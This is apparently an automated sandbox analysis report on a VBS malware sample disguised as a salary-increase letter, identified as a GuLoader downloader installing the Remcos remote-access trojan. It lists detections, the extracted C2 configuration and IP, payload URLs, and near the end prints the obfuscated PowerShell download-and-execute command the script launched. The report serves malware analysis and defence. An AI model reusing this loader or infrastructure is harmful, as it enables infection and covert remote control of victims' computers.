Windows Analysis Report
Salary Increase Letter_Oct 2024.vbs

Overview

General Information

Sample name:	Salary Increase Letter_Oct 2024.vbs
Analysis ID:	1533043
MD5:	487fcfcc1cb2d0a2f46618ee515bd75f
SHA1:	946401dfded730d640409b73842063ec9d341367
SHA256:	46e052d1dcd2455c656a4f96ce8a6ab32d0c3b4cdc151094df100b0c14b1ba64
Tags:	vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Early bird code injection technique detected

Found malware configuration

Sigma detected: Remcos

Suricata IDS alerts for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Potential malicious VBS script found (suspicious strings)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Queues an APC in another process (thread injection)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Found malware configuration

Source: 0000000D.00000002.2588683839.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "154.216.17.14:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KC5V8F", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara detected Remcos RAT

Source: Yara match	File source: 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2588683839.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2588683839.0000000009A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 8064, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.2% probability

Source:	Binary string: ore.pdb source: powershell.exe, 0000000A.00000002.1615492654.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000A.00000002.1643140338.0000000006FA3000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49976 -> 154.216.17.14:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49977 -> 154.216.17.14:2404

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 154.216.17.14

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.10:49976 -> 154.216.17.14:2404

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 178.237.33.50 178.237.33.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49978 -> 178.237.33.50:80

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /eOYLpCyF/Paasknnelses.u32 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.14

Source: global traffic	HTTP traffic detected: GET /eOYLpCyF/Paasknnelses.u32 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ZQVTKaPS/GtsQMOeeUIHdk195.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)

Source: global traffic	DNS traffic detected: DNS query: ln6b9.shop
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1270000099.000001C35205A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301263131.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301783807.000001C352000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 0000000A.00000002.1643140338.0000000006F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microB
Source: powershell.exe, 0000000A.00000002.1643140338.0000000006FA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftmB4
Source: powershell.exe, 00000008.00000002.1447424610.000001B5ECA6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1270000099.000001C35205A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301263131.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301783807.000001C352000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301263131.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301783807.000001C352000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1287009699.000001C3520A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301263131.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301783807.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1287632062.000001C3520A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1283851081.000001C3520A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300950781.000001C352045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301818193.000001C352048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabg
Source: wscript.exe, 00000002.00000003.1286829168.000001C353F71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/w
Source: wscript.exe, 00000002.00000003.1286738829.000001C35205E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1287735795.000001C352086000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d32349b469
Source: powershell.exe, 00000008.00000002.1415702842.000001B5D4835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1415702842.000001B5D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1415702842.000001B5D6052000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ln6b9.shop
Source: msiexec.exe, 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.bin#
Source: msiexec.exe, 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.binq
Source: powershell.exe, 00000008.00000002.1415702842.000001B5D4835000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32P
Source: powershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32XR
Source: powershell.exe, 00000008.00000002.1441853777.000001B5E4687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1270000099.000001C35205A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: wscript.exe, 00000002.00000003.1269707086.000001C35205A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1300081099.000001C351FEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1301263131.000001C352000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1301783807.000001C352000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1415702842.000001B5D4611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1618100382.0000000004791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000008.00000002.1415702842.000001B5D4611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.1618100382.0000000004791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1415702842.000001B5D51BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1441853777.000001B5E4687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2588683839.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2588683839.0000000009A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 8064, type: MEMORYSTR

Too many similar processes found

Source: msiexec.exe

Process created: 58

System Summary

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Call Frostgiant.ShellExecute(Sceneteknikere, Chr(34) & Stradivariusers & Chr(34), "", "", Tiggeren)

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraadde
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas 